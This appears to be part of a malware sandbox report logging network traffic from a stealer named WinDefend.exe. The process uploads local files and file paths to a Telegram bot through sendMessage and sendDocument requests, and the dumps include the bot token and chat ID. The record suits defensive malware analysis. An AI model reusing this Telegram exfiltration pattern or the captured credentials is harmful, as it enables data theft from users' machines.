2024-05-23 13:34:10 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 35 0d 25 e2 e3 cf d3 0d 0a 31 30 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 31 38 36 38 33 37 2f 4f 20 31 32 2f 45 20 31 38 32 34 39 37 2f 4e 20 31 2f 54 20 31 38 36 35 33 32 2f 48 20 5b 20 34 38 32 20 31 36 38 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 32 32 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 42 41 30 45 46 39 31 37 43 33 42 44 45 31 37 34 30 37 44 35 30 39 37 33 41 31 43 41 32 46 43 44 3e 3c 46 35 38 33 42 36 32 32 38 41 30 39 32 35 34 45 38 34 45 45 32 39 42 44 42 39 41 46 45 35 39 Data Ascii: %PDF-1.5%10 0 obj<</Linearized 1/L 186837/O 12/E 182497/N 1/T 186532/H [ 482 168]>>endobj 22 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<BA0EF917C3BDE17407D50973A1CA2FCD><F583B6228A09254E84EE29BDB9AFE59
2024-05-23 13:34:10 UTC	4096	OUT	Data Raw: 50 03 ea 41 23 68 01 27 40 07 38 0d 2e 80 cb e0 3a b8 09 ee 80 07 60 04 8c 83 e7 60 06 bc 01 f3 10 04 61 21 32 44 81 e4 21 55 48 0b 32 80 cc 20 06 64 0f b9 41 3e 50 20 14 0e 45 43 71 10 0f 12 42 b9 d0 16 a8 08 2a 85 2a a1 5a a8 11 fa 16 3a 05 5d 80 ae 42 03 d0 3d 68 14 9a 82 7e 85 de c3 08 4c 82 a9 b0 32 ac 0d 1b c3 0c d8 09 f6 86 83 e1 35 70 1c 9c 06 e7 c0 f9 f0 4e b8 02 ae 83 8f c1 ed f0 05 f8 3a 7c 07 1e 81 9f c3 b3 08 40 88 08 0d 51 43 0c 11 06 e2 82 f8 21 11 48 2c c2 47 36 20 85 48 39 52 87 b4 20 5d 48 2f 72 0b 19 41 a6 91 77 28 0c 8a 82 a2 a3 0c 51 b6 28 4f 54 08 8a 85 4a 43 6d 40 15 a3 2a 51 47 51 ed a8 1e d4 2d d4 28 6a 06 f5 09 4d 46 2b a1 0d d0 36 68 2f f4 2a 74 1c 3a 13 5d 80 2e 47 37 a0 db d0 97 d0 77 d0 e3 e8 37 18 0c 86 86 d1 c1 58 61 3c 31 Data Ascii: PA#h'@8.:``a!2D!UH2 dA>P ECqB*Z:]B=h~L25pN:\|@QC!H,G6 H9R ]H/rAw(Q(OTJCm@QGQ-(jMF+6h/*t:].G7w7Xa<1
2024-05-23 13:34:10 UTC	4096	OUT	Data Raw: 50 0f 09 94 14 e4 89 72 d0 b8 4c 91 d6 1b 3f ac 20 0b c3 96 33 44 94 61 81 3a c8 a1 8e ce 01 31 06 cb 34 62 38 22 51 01 fa 06 1d 28 d3 97 20 10 28 c9 0a 64 75 15 2f cd 9c 9e 25 87 73 4c 80 86 fa fb a2 db 55 9e 4e 07 f1 a2 ee 59 a5 8d fc 3d e5 b7 89 4f 21 3a 7e 8d 10 75 50 36 ca c8 54 9a 58 04 f1 b2 2c d5 48 de 7a 28 79 81 1f 8f 0a 72 7d 68 6d 9b 0a 32 30 d4 d5 5c 1a 1d ab 34 85 98 12 ed 0e 85 12 d1 b1 fa 21 89 6a 59 f1 75 eb 47 07 ea 5c 8a 0c f1 5f f0 ba 97 8a 4f d2 89 f7 66 65 a9 c2 cb d0 1a 1d 01 ef 8e 09 d4 45 89 3a 84 35 a5 4e 80 d6 c1 a3 61 a2 2c f8 bf 06 45 15 51 9f 17 d9 a4 57 d2 18 ff 52 cc 2c a2 d0 32 27 2f 1e 07 ea c7 0f cb c3 e4 af d2 d7 85 c6 df 87 13 47 89 39 a2 ae ce e3 a0 d2 7a 45 cd eb a1 dd ad f8 b1 95 ee 03 fe 6b e3 c2 7e 2e e9 e6 17 8b Data Ascii: PrL? 3Da:14b8"Q( (du/%sLUNY=O!:~uP6TX,Hz(yr}hm20\4!jYuG\_OfeE:5Na,EQWR,2'/G9zEk~.
2024-05-23 13:34:10 UTC	4096	OUT	Data Raw: 67 84 0a 91 f5 d6 67 7f 61 e7 7e 03 80 db 6a ce fd 24 a8 e6 cc 4f a2 05 d0 52 f7 e9 b5 5a 2e e2 b3 bd f0 f3 3d 79 a6 c7 e7 7a d3 c9 d1 e7 78 b2 2e c8 23 5a c6 d1 6d 2f db 7d 0a fc 8b 17 21 51 16 fb 71 c4 f9 5e ed 4b cb b1 9e 86 f9 63 1b f4 6c b7 0f d1 08 3f 57 8b b4 e7 57 68 84 9f a9 f1 39 da 05 9c e7 5c c8 19 0e be dd 3b 6a ce cd e4 9e 5f 3f eb ae 9a f9 4f ae 05 80 13 0b 5f 5d 9d 39 a6 da 57 00 fd 30 f7 0d 52 73 ac 44 3a 9e ed a0 b6 d6 11 d8 10 97 4b bf 4e cd 53 98 1f 30 c7 fd 24 f6 c0 c5 39 9a f9 95 fb 80 f9 9b d0 e1 f9 6a cc 79 05 b4 59 42 ce 7d ee 0b 32 5d 86 da 8f 74 b0 06 ca 7d ed de 34 0e f3 9c 3f 0c 6a fe bb 85 36 03 7e 7c d3 37 4b 88 b9 fd 1b f7 a8 99 e8 fe 5b ca 52 f7 20 e6 bf 41 62 0e c4 bc d2 d1 5e 8c 35 60 1c dd ca f3 9d 9c c7 d2 51 66 31 c7 Data Ascii: gga~j$ORZ.=yzx.#Zm/}!Qq^Kcl?WWh9\;j_?O_]9W0RsD:KNS0$9jyYB}2]t}4?j6~\|7K[R Ab^5`Qf1
2024-05-23 13:34:10 UTC	4096	OUT	Data Raw: a1 04 49 61 b8 4a 04 65 14 a3 5a 85 aa 94 38 ad c4 29 f5 ec 37 15 fa b7 12 ff 52 e2 57 25 7e a9 68 31 16 e2 e7 8a 16 19 10 3f a9 d0 8f 4a fc a0 c4 49 f5 ec 7b 15 fa 4e 89 13 4a 1c 57 cf be 55 e2 1b a5 fc 5a 89 63 4a 7c a5 c4 97 2a ca 17 2a f4 b9 0a 7d a6 42 9f 2a f1 89 12 1f ab 67 1f 29 f1 4f a5 fc 87 12 7f 57 e2 43 25 fe a6 a2 7c a0 42 ef 2b f1 5e 45 f3 09 10 ef 56 34 1f 0f 71 54 89 77 94 f2 6d 25 de 52 e2 4d 25 8e a8 28 6f 28 f1 7f ec db 09 54 54 d5 1f 07 f0 7b df 00 83 0c c3 cc e0 cc 28 02 be 11 73 0b 05 dc c7 34 19 45 71 21 40 81 67 02 8a 21 33 c0 28 82 ce a2 69 a2 a4 69 96 b9 54 56 da 62 b6 98 d9 98 c1 73 5f 52 cb 6c 35 2d b3 d5 32 6d df 2c db 4b 23 fe df 37 3f fa 9f fe ff d3 e9 9c ff bf f3 3f e7 df 39 77 e0 f3 be f7 de 77 df 9d 37 30 f7 87 9e 03 c7 Data Ascii: IaJeZ8)7RW%~h1?JI{NJWUZcJ\|*}Bg)OWC%\|B+^EV4qTwm%RM%(o(TT{(s4Eq!@g!3(iiTVbs_Rl5-2m,K#7??9ww70
2024-05-23 13:34:11 UTC	4096	OUT	Data Raw: 6c b7 a7 0f 39 aa cc cd ee 24 ac 50 22 ff 5e 0a 92 2b 77 01 12 56 d0 6e f0 d8 5d 3a 9c 0e 39 ee f4 e4 b1 04 69 89 c8 2e 40 12 ac 00 1e 2f d8 74 f3 5d 0f 7f f4 f1 a7 ae 48 33 37 b1 81 2b 98 06 c9 9f ca e5 a3 07 05 53 11 d3 b9 fc 19 de a2 49 0b cb 83 e7 f9 8a 2e f3 e7 ef f5 e7 5f 86 f1 e5 5f 56 41 b8 14 52 00 29 cf ff 8e c8 b7 21 05 df 2e 2f bc a4 0c 50 80 d9 53 5a b0 a7 18 51 44 b8 b8 b0 e0 e2 a2 42 48 61 21 7c 9c 5f 70 51 7e 21 c1 5b 78 61 5e e1 9e 89 05 17 e7 15 9c 9a 57 3e c5 1b 13 bc 93 39 ef 74 c4 34 08 dc db a9 64 cf e1 ce 63 a6 73 05 33 b8 82 99 88 19 4a a6 c9 8f 0b a7 43 c8 e3 99 0c 0a 0c 29 9c 45 28 90 98 69 0f f0 11 45 b3 4c 28 c6 cc 16 97 1c ad a0 58 7c 50 02 fe cf 81 14 cf e5 4a 30 73 e0 42 2d e0 2d 60 6b 46 1c 4d 28 c5 a0 6d 16 37 72 25 8d e8 Data Ascii: l9$P"^+wVn]:9i.@/t]H37+SI.__VAR)!./PSZQDBHa!\|_pQ~![xa^W>9t4dcs3JC)E(iEL(X\|PJ0sB--`kFM(m7r%
2024-05-23 13:34:11 UTC	4096	OUT	Data Raw: 4d 3f 75 e8 b4 ee ea 6d a1 dd f0 ab 31 3d 85 c6 79 cb b3 8a 66 9e 52 ae 8c ee f3 35 9d a7 ac 73 29 8d f9 50 ea 64 b3 bc ff 46 d3 b8 1a ba b5 41 96 6e c0 65 7a da b3 56 43 01 51 07 8d 7e 9f 94 74 4a 77 11 21 9a d5 67 52 d2 b1 78 3c 01 bd 18 3e d6 87 c1 ed ba 7c bc 9f 27 7e 31 81 af 19 00 a8 a3 2a 7d f8 1a 08 57 96 20 75 14 c8 53 a4 1e 00 4f ca 90 f2 80 36 85 a7 2a 6d 78 2a ea 71 87 5c 8e 02 8e 6b a9 a9 be ff ae 1f be fe f2 cb df fe ef f3 9a ab 63 3e 8e f3 73 7c c6 53 23 ef 29 d6 05 82 3d 15 63 7a 2a f5 25 f2 94 62 80 32 1a 9a 48 8c a0 dc 9f 4a f1 56 d6 4a f4 37 1e 3d a5 6c a8 c9 78 ea 2b e4 29 7c 18 bf 34 9e 9a 0f a0 3c d5 2b d5 fb 29 e7 6b 48 bd 5f 9d af e1 ea 50 c9 a1 ca ac e7 83 ce 1d 0a 4f b9 f5 24 15 f1 b8 42 4e 98 e2 eb 9e 36 f5 c1 03 07 5e 7e ee f9 Data Ascii: M?um1=yfR5s)PdFAnezVCQ~tJw!gRx<>\|'~1}W uSO6mxq\kc>s\|S#)=cz%b2HJVJ7=lx+)\|4<+)kH_PO$BN6^~
2024-05-23 13:34:11 UTC	4096	OUT	Data Raw: ae 5d 7d 33 66 d4 e6 e6 02 bf 04 41 24 25 38 d8 29 3e cb 9e 82 d5 17 a3 e6 29 aa c4 c2 2e 02 92 d4 d0 3c d5 99 be 80 32 9e ca 78 6a f4 3d a5 7d 09 a9 ca 11 eb 77 c4 09 b8 c8 41 c0 25 8b 20 da 92 2a 25 24 22 18 75 ca 1a 97 55 68 91 53 67 56 ab 02 fa 04 5d 54 05 18 74 ee 34 65 89 34 8a 6a 32 9e 1a 56 4f 91 11 18 3c f6 4e cf af ed fe c6 65 d7 7f f2 f1 87 ff 39 7c f8 b5 0f 3f ff d1 6f 5f ff d6 fe a7 76 ee 7b 7c eb 15 07 b7 5d 79 f0 b2 bb 7e ff eb e7 df 7d f7 83 4f 7f fe d0 43 eb 97 2d ad c9 2f 28 e1 b8 52 58 1a c1 07 04 47 d0 a1 87 a0 46 a0 00 9a 43 94 f3 bc 8f e7 bb 1c c2 3e 0f f2 54 de 70 78 2a c8 42 d1 da ac 2e 11 34 85 87 86 c2 8c a4 a7 2c 32 5c db 49 57 6a 19 4f 8d 99 a7 98 b5 04 23 ef 29 3a 49 e8 88 cf 73 54 cf 57 32 0f c3 57 f5 53 40 73 f1 95 bd 00 12 Data Ascii: ]}3fA$%8)>).<2xj=}wA% %$"uUhSgV]Tt4e4j2VO<Ne9\|?o_v{\|]y~}OC-/(RXGFC>TpxB.4,2\IWjO#):IsTW2WS@s
2024-05-23 13:34:11 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:11 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	61021	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:12 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 171 Expect: 100-continue
2024-05-23 13:34:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:12 UTC	171	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 63 72 6f 62 61 74 5f 72 65 61 64 65 72 5f 61 70 70 69 63 6f 6e 5f 31 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 61 63 72 6f 62 61 74 5f 72 65 61 64 65 72 5f 61 70 70 69 63 6f 6e 5f 31 36 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 36 39 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+acrobat_reader_appicon_16.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cacrobat_reader_appicon_16.png%0ASize%3A+369+B
2024-05-23 13:34:12 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:12 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	61029	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:12 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 351 Expect: 100-continue
2024-05-23 13:34:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:12 UTC	351	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 73 71 75 61 72 65 74 69 6c 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 50 61 63 6b 61 67 65 73 25 35 43 4d 69 63 72 6f 73 6f 66 74 2e 4d 69 63 72 Data Ascii: chat_id=1655240967&text=File%3A+squaretile.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CPackages%5CMicrosoft.Micr
2024-05-23 13:34:13 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:12 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	61033	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:13 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="fdb9ea01-1ae2-433c-a1ca-379b15d02c9c" Host: api.telegram.org Content-Length: 731 Expect: 100-continue
2024-05-23 13:34:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:13 UTC	40	OUT	Data Raw: 2d 2d 66 64 62 39 65 61 30 31 2d 31 61 65 32 2d 34 33 33 63 2d 61 31 63 61 2d 33 37 39 62 31 35 64 30 32 63 39 63 0d 0a Data Ascii: --fdb9ea01-1ae2-433c-a1ca-379b15d02c9c
2024-05-23 13:34:13 UTC	137	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 63 72 6f 62 61 74 5f 72 65 61 64 65 72 5f 61 70 70 69 63 6f 6e 5f 31 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 63 72 6f 62 61 74 5f 72 65 61 64 65 72 5f 61 70 70 69 63 6f 6e 5f 31 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=acrobat_reader_appicon_16.png; filename*=utf-8''acrobat_reader_appicon_16.png
2024-05-23 13:34:13 UTC	369	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 01 23 49 44 41 54 38 8d 63 dc cc cd 20 c0 c0 c0 b0 81 81 81 c1 9e 81 34 70 90 81 81 21 00 64 c0 01 32 34 c3 c0 41 26 5c 9a 15 b3 0b 18 3c 9e 7d 60 e0 92 57 c0 67 80 3d 13 2e 19 09 df 00 86 43 96 06 0c 5a 9d 13 f0 3a 81 05 97 c4 f7 87 0f 18 f4 67 2e c0 ab 19 04 70 ba e0 f1 92 05 0c c2 36 f6 60 83 c8 32 80 55 40 00 4c ff fe f8 81 3c 03 24 7c 02 18 9e 2c 5d c8 a0 98 95 cf c0 a7 67 80 d3 00 ac 61 00 0a 79 99 e8 78 86 7d da 8a 60 be d5 8e 03 0c 1f 2f 5d 80 b8 e8 c3 07 86 5b 6d 0d 0c 9f a0 7c 0c 17 80 34 c3 02 cf 72 fb 01 b0 17 ee 4d 99 c0 c0 ca 2f c0 70 26 3c 80 81 5f cf 80 41 ad aa 01 d3 05 20 Data Ascii: PNGIHDRapHYs.#.#x?v#IDAT8c 4p!d24A&\<}`Wg=.CZ:g.p6`2U@L<$\|,]gayx}`/][m\|4rM/p&<_A
2024-05-23 13:34:13 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 64 62 39 65 61 30 31 2d 31 61 65 32 2d 34 33 33 63 2d 61 31 63 61 2d 33 37 39 62 31 35 64 30 32 63 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --fdb9ea01-1ae2-433c-a1ca-379b15d02c9cContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:13 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:13 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 64 62 39 65 61 30 31 2d 31 61 65 32 2d 34 33 33 63 2d 61 31 63 61 2d 33 37 39 62 31 35 64 30 32 63 39 63 2d 2d 0d 0a Data Ascii: --fdb9ea01-1ae2-433c-a1ca-379b15d02c9c--
2024-05-23 13:34:14 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:14 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	61034	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:13 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="d131e3aa-cf24-430d-9771-63553786180d" Host: api.telegram.org Content-Length: 2725 Expect: 100-continue
2024-05-23 13:34:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:14 UTC	40	OUT	Data Raw: 2d 2d 64 31 33 31 65 33 61 61 2d 63 66 32 34 2d 34 33 30 64 2d 39 37 37 31 2d 36 33 35 35 33 37 38 36 31 38 30 64 0d 0a Data Ascii: --d131e3aa-cf24-430d-9771-63553786180d
2024-05-23 13:34:14 UTC	107	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 71 75 61 72 65 74 69 6c 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 71 75 61 72 65 74 69 6c 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=squaretile.png; filename*=utf-8''squaretile.png
2024-05-23 13:34:14 UTC	2393	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 96 08 06 00 00 00 3c 01 71 e2 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 08 fb 49 44 41 54 78 da ec 9d 5b 88 24 57 19 c7 ff a7 aa ef bd d3 3d d3 3b bb 33 99 6c 76 77 34 ea 66 36 9a 18 09 24 26 78 79 d0 18 a3 e4 25 60 54 84 3c e8 8b 46 10 d6 87 05 85 80 2f 2a 88 ec 83 97 17 41 41 50 31 ea 43 90 28 8b 10 08 86 84 80 31 2c 6b 04 0d 62 e2 66 77 36 eb ec 6e cf cc 4e 77 75 5d 8e df 39 55 d5 97 b9 74 66 43 cf ac 53 fd ff c1 a1 4e 75 d5 74 f7 74 ff e6 fb be 73 fa 54 8f d2 5a 83 90 51 e3 f0 25 20 14 8b 50 2c 42 b1 08 a1 58 84 62 11 8a 45 08 c5 22 14 8b 50 2c 42 28 16 a1 58 84 62 11 42 b1 08 c5 22 14 8b 10 8a 45 28 16 a1 58 Data Ascii: PNGIHDR<qtEXtSoftwareAdobe ImageReadyqe<IDATx[$W=;3lvw4f6$&xy%`T<F/*AAP1C(1,kbfw6nNwu]9UtfCSNuttsTZQ% P,BXbE"P,B(XbB"E(X
2024-05-23 13:34:14 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 64 31 33 31 65 33 61 61 2d 63 66 32 34 2d 34 33 30 64 2d 39 37 37 31 2d 36 33 35 35 33 37 38 36 31 38 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --d131e3aa-cf24-430d-9771-63553786180dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:14 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:14 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 64 31 33 31 65 33 61 61 2d 63 66 32 34 2d 34 33 30 64 2d 39 37 37 31 2d 36 33 35 35 33 37 38 36 31 38 30 64 2d 2d 0d 0a Data Ascii: --d131e3aa-cf24-430d-9771-63553786180d--
2024-05-23 13:34:14 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:14 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	61036	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:14 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 154 Expect: 100-continue
2024-05-23 13:34:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:15 UTC	154	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 34 35 37 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+PDFSigQFormalRep.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CPDFSigQFormalRep.pdf%0ASize%3A+457+KB
2024-05-23 13:34:15 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:15 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	61038	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:15 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:34:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:15 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 69 6e 79 74 69 6c 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 